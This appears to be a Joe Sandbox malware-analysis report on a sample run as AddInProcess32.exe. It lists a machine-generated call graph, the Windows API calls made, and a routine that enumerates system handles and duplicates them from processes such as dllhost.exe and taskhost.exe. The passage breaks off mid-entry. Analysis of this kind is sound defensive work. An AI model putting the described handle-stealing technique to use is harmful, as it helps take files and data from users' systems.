41bee7 37651 41be69 37650->37651 37681 41a453 86 API calls 37650->37681 37651->37630 37651->37640 37653->37650 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37680 4446ce 11 API calls 37654->37680 37657 41bef0 37655->37657 37660 41bee2 37655->37660 37657->37650 37658 41bf01 37657->37658 37659 41bf24 memset 37658->37659 37664 41bf14 37658->37664 37678 418a6d memset memcpy memset 37658->37678 37659->37651 37666 41ac13 37660->37666 37679 41a223 memset memcpy memset 37664->37679 37665 41bf20 37665->37659 37667 41ac52 37666->37667 37668 41ac3f memset 37666->37668 37670 41ac6a 37667->37670 37682 41dc14 19 API calls 37667->37682 37673 41acd9 37668->37673 37672 41aca1 37670->37672 37683 41519d 37670->37683 37672->37673 37674 41acc0 memset 37672->37674 37675 41accd memcpy 37672->37675 37673->37650 37674->37673 37675->37673 37676->37651 37677->37653 37678->37664 37679->37665 37680->37650 37682->37670 37686 4175ed 37683->37686 37694 417570 SetFilePointer 37686->37694 37689 41760a ReadFile 37690 417637 37689->37690 37691 417627 GetLastError 37689->37691 37692 41763e memset 37690->37692 37693 4151b3 37690->37693 37691->37693 37692->37693 37693->37672 37695 4175b2 37694->37695 37696 41759c GetLastError 37694->37696 37695->37689 37695->37693 37696->37695 37697 4175a8 GetLastError 37696->37697 37697->37695 37698->37643 37699 417bc5 37700 417c61 37699->37700 37701 417bda 37699->37701 37701->37700 37702 417bf6 UnmapViewOfFile CloseHandle 37701->37702 37704 417c2c 37701->37704 37706 4175b7 37701->37706 37702->37701 37702->37702 37704->37701 37711 41851e 20 API calls 37704->37711 37707 4175d6 CloseHandle 37706->37707 37708 4175c8 37707->37708 37709 4175df 37707->37709 37708->37709 37710 4175ce Sleep 37708->37710 37709->37701 37710->37707 37711->37704 37718 4415ea 37726 4304b2 37718->37726 37720 4415fe 37721 4418ea 37720->37721 37722 442bd4 37720->37722 37723 4418e2 37720->37723 37722->37721 37774 441409 memset 37722->37774 37723->37721 37773 4414a9 12 API calls 37723->37773 37775 43041c 12 API calls 37726->37775 37728 4304cd 37733 430557 37728->37733 37776 43034a memcpy 37728->37776 37730 4304f3 37730->37733 37777 430468 11 API calls 37730->37777 37732 430506 37732->37733 37734 43057b 37732->37734 37778 43817e 37732->37778 37733->37720 37783 415a91 37734->37783 37739 4305e4 37739->37733 37788 4328e4 12 API calls 37739->37788 37741 43052d 37741->37733 37741->37734 37744 430542 37741->37744 37743 4305fa 37745 430609 37743->37745 37789 423383 11 API calls 37743->37789 37744->37733 37782 4169a7 11 API calls 37744->37782 37790 423330 11 API calls 37745->37790 37748 430634 37791 423399 11 API calls 37748->37791 37750 430648 37792 4233ae 11 API calls 37750->37792 37752 43066b 37793 423330 11 API calls 37752->37793 37754 43067d 37794 4233ae 11 API calls 37754->37794 37756 430695 37795 423330 11 API calls 37756->37795 37758 4306d6 37797 423330 11 API calls 37758->37797 37759 4306a7 37759->37758 37760 4306c0 37759->37760 37796 4233ae 11 API calls 37760->37796 37763 4306d1 37798 430369 17 API calls 37763->37798 37765 4306f3 37799 423330 11 API calls 37765->37799 37767 430704 37800 423330 11 API calls 37767->37800 37769 430710 37801 423330 11 API calls 37769->37801 37771 43071e 37802 423383 11 API calls 37771->37802 37773->37721 37774->37722 37775->37728 37776->37730 37777->37732 37779 438187 37778->37779 37781 438192 37778->37781 37803 4380f6 37779->37803 37781->37741 37782->37733 37784 415a9d 37783->37784 37785 415ab3 37784->37785 37786 415aa4 memset 37784->37786 37785->37733 37787 4397fd memset 37785->37787 37786->37785 37787->37739 37788->37743 37789->37745 37790->37748 37791->37750 37792->37752 37793->37754 37794->37756 37795->37759 37796->37763 37797->37763 37798->37765 37799->37767 37800->37769 37801->37771 37802->37733 37805 43811f 37803->37805 37804 438164 37804->37781 37805->37804 37808 437e5e 37805->37808 37831 4300e8 memset memset memcpy 37805->37831 37832 437d3c 37808->37832 37810 437eb3 37810->37805 37811 437ea9 37811->37810 37816 437f22 37811->37816 37847 41f432 37811->37847 37814 437f06 37897 415c56 11 API calls 37814->37897 37818 437f7f 37816->37818 37898 432d4e 37816->37898 37817 437f95 37902 415c56 11 API calls 37817->37902 37818->37817 37820 43802b 37818->37820 37858 4165ff 37820->37858 37822 437fa3 37822->37810 37905 41f638 104 API calls 37822->37905 37827 43806b 37829 438094 37827->37829 37903 42f50e 138 API calls 37827->37903 37829->37822 37904 4300e8 memset memset memcpy 37829->37904 37831->37805 37833 437d69 37832->37833 37836 437d80 37832->37836 37918 437ccb 11 API calls 37833->37918 37835 437d76 37835->37811 37836->37835 37837 437da3 37836->37837 37839 437d90 37836->37839 37906 438460 37837->37906 37839->37835 37922 437ccb 11 API calls 37839->37922 37841 437de8 37921 424f26 123 API calls 37841->37921 37843 437dcb 37843->37841 37919 444283 13 API calls 37843->37919 37845 437dfc 37920 437ccb 11 API calls 37845->37920 37848 41f54d 37847->37848 37852 41f44f 37847->37852 37849 41f466 37848->37849 38093 41c635 memset memset 37848->38093 37849->37814 37849->37816 37852->37849 37856 41f50b 37852->37856 38064 41f1a5 37852->38064 38089 41c06f memcmp 37852->38089 38090 41f3b1 90 API calls 37852->38090 38091 41f398 86 API calls 37852->38091 37856->37848 37856->37849 38092 41c295 86 API calls 37856->38092 37859 4165a0 11 API calls 37858->37859 37860 41660d 37859->37860 37861 437371 37860->37861 37862 41703f 11 API calls 37861->37862 37863 437399 37862->37863 37864 43739d 37863->37864 37866 4373ac 37863->37866 38202 4446ea 11 API calls 37864->38202 37867 416935 16 API calls 37866->37867 37883 4373ca 37867->37883 37868 437584 37870 4375bc 37868->37870 38209 42453e 123 API calls 37868->38209 37869 438460 134 API calls 37869->37883 37872 415c7d 16 API calls 37870->37872 37873 4375d2 37872->37873 37877 4373a7 37873->37877 38210 4442e6 37873->38210 37876 4375e2 37876->37877 38217 444283 13 API calls 37876->38217 37877->37827 37879 415a91 memset 37879->37883 37882 43758f 38208 42453e 123 API calls 37882->38208 37883->37868 37883->37869 37883->37879 37883->37882 37896 437d3c 135 API calls 37883->37896 38184 4251c4 37883->38184 38203 425433 13 API calls 37883->38203 38204 425413 17 API calls 37883->38204 38205 42533e 16 API calls 37883->38205 38206 42538f 16 API calls 37883->38206 38207 42453e 123 API calls 37883->38207 37886 4375f4 37890 437620 37886->37890 37891 43760b 37886->37891 37888 43759f 37889 416935 16 API calls 37888->37889 37889->37868 37892 416935 16 API calls 37890->37892 38218 444283 13 API calls 37891->38218 37892->37877 37895 437612 memcpy 37895->37877 37896->37883 37897->37810 37899 432d65 37898->37899 37900 432d58 37898->37900 37899->37818 38293 432cc4 memset memset memcpy 37900->38293 37902->37822 37903->37829 37904->37822 37905->37810 37923 41703f 37906->37923 37908 43847a 37909 43848a 37908->37909 37910 43847e 37908->37910 37930 438270 37909->37930 37960 4446ea 11 API calls 37910->37960 37914 438488 37914->37843 37916 4384bb 37917 438270 134 API calls 37916->37917 37917->37914 37918->37835 37919->37845 37920->37841 37921->37835 37922->37835 37924 417044 37923->37924 37925 41705c 37923->37925 37929 417055 37924->37929 37962 416760 11 API calls 37924->37962 37926 417075 37925->37926 37963 41707a 11 API calls 37925->37963 37926->37908 37929->37908 37931 415a91 memset 37930->37931 37932 43828d 37931->37932 37933 438297 37932->37933 37934 438341 37932->37934 37936 4382d6 37932->37936 37935 415c7d 16 API calls 37933->37935 37964 44358f 37934->37964 37938 438458 37935->37938 37939 4382fb 37936->37939 37940 4382db 37936->37940 37938->37914 37961 424f26 123 API calls 37938->37961 38007 415c23 memcpy 37939->38007 37995 416935 37940->37995 37943 438305 37947 44358f 19 API calls 37943->37947 37949 438318 37943->37949 37944 4382e9 38003 415c7d 37944->38003 37946 438373 37952 438383 37946->37952 38008 4300e8 memset memset memcpy 37946->38008 37947->37949 37949->37946 37990 43819e 37949->37990 37951 4383cd 37953 4383f5 37951->37953 38010 42453e 123 API calls 37951->38010 37952->37951 38009 415c23 memcpy 37952->38009 37956 438404 37953->37956 37957 43841c 37953->37957 37959 416935 16 API calls 37956->37959 37958 416935 16 API calls 37957->37958 37958->37933 37959->37933 37960->37914 37961->37916 37962->37929 37963->37924 37965 4435be 37964->37965 37966 44360c 37965->37966 37968 443676 37965->37968 37971 4436ce 37965->37971 37975 44366c 37965->37975 38011 442ff8 37965->38011 37966->37949 37967 443758 37980 443775 37967->37980 38020 441409 memset 37967->38020 37968->37967 37970 443737 37968->37970 37972 442ff8 19 API calls 37968->37972 37973 442ff8 19 API calls 37970->37973 37977 4165ff 11 API calls 37971->37977 37972->37970 37973->37967 38019 4169a7 11 API calls 37975->38019 37976 4437be 37981 4437de 37976->37981 38022 416760 11 API calls 37976->38022 37977->37968 37980->37976 38021 415c56 11 API calls 37980->38021 37984 443801 37981->37984 38023 42463b memset memcpy 37981->38023 37983 443826 38025 43bd08 memset 37983->38025 37984->37983 38024 43024d memset 37984->38024 37988 443837 37988->37966 38026 43024d memset 37988->38026 37991 438246 37990->37991 37993 4381ba 37990->37993 37991->37946 37992 41f432 110 API calls 37992->37993 37993->37991 37993->37992 38042 41f638 104 API calls 37993->38042 37996 41693e 37995->37996 37999 41698e 37995->37999 37997 41694c 37996->37997 38043 422fd1 memset 37996->38043 37997->37999 38044 4165a0 37997->38044 37999->37944 38004 415c81 38003->38004 38005 415c9c 38003->38005 38004->38005 38006 416935 16 API calls 38004->38006 38005->37933 38006->38005 38007->37943 38008->37952 38009->37951 38010->37953 38012 442ffe 38011->38012 38013 443094 38012->38013 38017 443092 38012->38017 38027 4414ff 38012->38027 38039 4169a7 11 API calls 38012->38039 38040 441325 memset 38012->38040 38041 4414a9 12 API calls 38013->38041 38017->37965 38019->37968 38020->37967 38021->37976 38022->37981 38023->37984 38024->37983 38025->37988 38026->37988 38028 441539 38027->38028 38029 441547 38027->38029 38028->38029 38030 441575 38028->38030 38031 441582 38028->38031 38032 4418e2 38029->38032 38038 442bd4 38029->38038 38034 42fccf 18 API calls 38030->38034 38033 43275a 12 API calls 38031->38033 38035 4414a9 12 API calls 38032->38035 38036 4418ea 38032->38036 38033->38029 38034->38029 38035->38036 38036->38012 38037 441409 memset 38037->38038 38038->38036 38038->38037 38039->38012 38040->38012 38041->38017 38042->37993 38043->37997 38050 415cfe 38044->38050 38049 422b84 15 API calls 38049->37999 38051 41628e 38050->38051 38056 415d23 __aullrem __aulldvrm 38050->38056 38058 416520 38051->38058 38052 4163ca 38053 416422 10 API calls 38052->38053 38053->38051 38054 416422 10 API calls 38054->38056 38055 416172 memset 38055->38056 38056->38051 38056->38052 38056->38054 38056->38055 38057 415cb9 10 API calls 38056->38057 38057->38056 38059 416527 38058->38059 38063 416574 38058->38063 38060 415700 10 API calls 38059->38060 38061 416544 38059->38061 38059->38063 38060->38061 38062 416561 memcpy 38061->38062 38061->38063 38062->38063 38063->37999 38063->38049 38094 41bc3b 38064->38094 38067 41edad 86 API calls 38068 41f1cb 38067->38068 38069 41f1f5 memcmp 38068->38069 38070 41f20e 38068->38070 38074 41f282 38068->38074 38069->38070 38071 41f21b memcmp 38070->38071 38070->38074 38072 41f326 38071->38072 38075 41f23d 38071->38075 38073 41ee6b 86 API calls 38072->38073 38072->38074 38073->38074 38074->37852 38075->38072 38076 41f28e memcmp 38075->38076 38118 41c8df 56 API calls 38075->38118 38076->38072 38077 41f2a9 38076->38077 38077->38072 38080 41f308 38077->38080 38081 41f2d8 38077->38081 38079 41f269 38079->38072 38082 41f287 38079->38082 38083 41f27a 38079->38083 38080->38072 38123 4446ce 11 API calls 38080->38123 38084 41ee6b 86 API calls 38081->38084 38082->38076 38085 41ee6b 86 API calls 38083->38085 38086 41f2e0 38084->38086 38085->38074 38119 41b1ca 38086->38119 38089->37852 38090->37852 38091->37852 38092->37848 38093->37849 38096 41bc54 38094->38096 38103 41be0b 38094->38103 38099 41bd61 38096->38099 38096->38103 38107 41bc8d 38096->38107 38124 41baf0 55 API calls 38096->38124 38098 41be45 38098->38067 38098->38074 38099->38098 38133 41a25f memset 38099->38133 38101 41be04 38131 41aee4 56 API calls 38101->38131 38103->38099 38132 41ae17 34 API calls 38103->38132 38104 41bd42 38104->38099 38104->38101 38105 41bdd8 memset 38104->38105 38106 41bdba 38104->38106 38108 41bde7 memcmp 38105->38108 38117 4175ed 6 API calls 38106->38117 38107->38099 38107->38104 38109 41bd18 38107->38109 38125 4151e3 38107->38125 38108->38101 38111 41bdfd 38108->38111 38109->38099 38109->38104 38129 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38109->38129 38110 41bdcc 38110->38099 38110->38108 38130 41a1b0 memset 38111->38130 38117->38110 38118->38079 38120 41b1e4 38119->38120 38122 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38120->38122 38183 41a1b0 memset 38120->38183 38122->38074 38123->38072 38124->38107 38134 41837f 38125->38134 38128 444706 11 API calls 38128->38109 38129->38104 38130->38101 38131->38103 38132->38099 38133->38098 38135 4183c1 38134->38135 38138 4183ca 38134->38138 38181 418197 25 API calls 38135->38181 38139 4151f9 38138->38139 38155 418160 38138->38155 38139->38109 38139->38128 38140 4183e5 38140->38139 38164 41739b 38140->38164 38143 418444 CreateFileW 38145 418477 38143->38145 38144 41845f CreateFileA 38144->38145 38146 4184c2 memset 38145->38146 38147 41847e GetLastError free 38145->38147 38167 418758 38146->38167 38148 4184b5 38147->38148 38149 418497 38147->38149 38182 444706 11 API calls 38148->38182 38151 41837f 49 API calls 38149->38151 38151->38139 38156 41739b GetVersionExW 38155->38156 38157 418165 38156->38157 38159 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 38157->38159 38160 418178 38159->38160 38161 41817f 38160->38161 38162 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 38160->38162 38161->38140 38163 418188 free 38162->38163 38163->38140 38165 4173d6 38164->38165 38166 4173ad GetVersionExW 38164->38166 38165->38143 38165->38144 38166->38165 38168 418680 43 API calls 38167->38168 38169 418782 38168->38169 38170 418160 11 API calls 38169->38170 38172 418506 free 38169->38172 38171 418799 38170->38171 38171->38172 38173 41739b GetVersionExW 38171->38173 38172->38139 38174 4187a7 38173->38174 38175 4187da 38174->38175 38176 4187ad GetDiskFreeSpaceW 38174->38176 38178 4187ec GetDiskFreeSpaceA 38175->38178 38180 4187e8 38175->38180 38179 418800 free 38176->38179 38178->38179 38179->38172 38180->38178 38181->38138 38182->38139 38183->38122 38219 424f07 38184->38219 38186 4251e4 38187 4251f7 38186->38187 38188 4251e8 38186->38188 38227 4250f8 38187->38227 38226 4446ea 11 API calls 38188->38226 38190 4251f2 38190->37883 38192 425209 38195 425249 38192->38195 38198 4250f8 127 API calls 38192->38198 38199 425287 38192->38199 38235 4384e9 135 API calls 38192->38235 38236 424f74 124 API calls 38192->38236 38193 415c7d 16 API calls 38193->38190 38195->38199 38237 424ff0 13 API calls 38195->38237 38198->38192 38199->38193 38200 425266 38200->38199 38238 415be9 memcpy 38200->38238 38202->37877 38203->37883 38204->37883 38205->37883 38206->37883 38207->37883 38208->37888 38209->37870 38211 4442eb 38210->38211 38214 444303 38210->38214 38291 41707a 11 API calls 38211->38291 38213 4442f2 38213->38214 38292 4446ea 11 API calls 38213->38292 38214->37876 38216 444300 38216->37876 38217->37886 38218->37895 38220 424f1f 38219->38220 38221 424f0c 38219->38221 38240 424eea 11 API calls 38220->38240 38239 416760 11 API calls 38221->38239 38224 424f18 38224->38186 38225 424f24 38225->38186 38226->38190 38228 425108 38227->38228 38234 42510d 38227->38234 38273 424f74 124 API calls 38228->38273 38231 42516e 38233 415c7d 16 API calls 38231->38233 38232 425115 38232->38192 38233->38232 38234->38232 38241 42569b 38234->38241 38235->38192 38236->38192 38237->38200 38238->38199 38239->38224 38240->38225 38251 4256f1 38241->38251 38269 4259c2 38241->38269 38246 4260dd 38285 424251 120 API calls 38246->38285 38250 429a4d 38253 429a66 38250->38253 38254 429a9b 38250->38254 38251->38250 38252 422aeb memset memcpy memcpy 38251->38252 38256 4260a1 38251->38256 38265 4259da 38251->38265 38267 429ac1 38251->38267 38251->38269 38272 425a38 38251->38272 38274 4227f0 memset memcpy 38251->38274 38275 422b84 15 API calls 38251->38275 38276 422b5d memset memcpy memcpy 38251->38276 38277 422640 13 API calls 38251->38277 38279 4241fc 11 API calls 38251->38279 38280 42413a 90 API calls 38251->38280 38252->38251 38286 415c56 11 API calls 38253->38286 38258 429a96 38254->38258 38288 416760 11 API calls 38254->38288 38283 415c56 11 API calls 38256->38283 38289 424251 120 API calls 38258->38289 38261 429a7a 38287 416760 11 API calls 38261->38287 38284 416760 11 API calls 38265->38284 38268 425ad6 38267->38268 38290 415c56 11 API calls 38267->38290 38268->38231 38269->38268 38278 415c56 11 API calls 38269->38278 38272->38269 38281 422640 13 API calls 38272->38281 38282 4226e0 12 API calls 38272->38282 38273->38234 38274->38251 38275->38251 38276->38251 38277->38251 38278->38265 38279->38251 38280->38251 38281->38272 38282->38272 38283->38265 38284->38246 38285->38268 38286->38261 38287->38258 38288->38258 38289->38267 38290->38265 38291->38213 38292->38216 38293->37899 40184 4147f3 40187 414561 40184->40187 40186 414813 40188 41456d 40187->40188 40189 41457f GetPrivateProfileIntW 40187->40189 40192 4143f1 memset _itow WritePrivateProfileStringW 40188->40192 40189->40186 40191 41457a 40191->40186 40192->40191

                                                                                                  Executed Functions

                                                                                                  Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                  • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                  • API String ID: 708747863-3398334509
                                                                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                  Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1355100292-0
                                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                  Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$FirstNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 1690352074-0
                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                  Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoSystemmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3558857096-0
                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                  Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 